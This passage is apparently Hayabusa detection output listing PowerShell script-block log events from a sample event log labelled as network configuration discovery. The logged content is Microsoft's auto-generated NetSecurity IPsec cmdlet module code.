'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if 
($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecMainModeCryptoSet ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.989 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' 
$script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
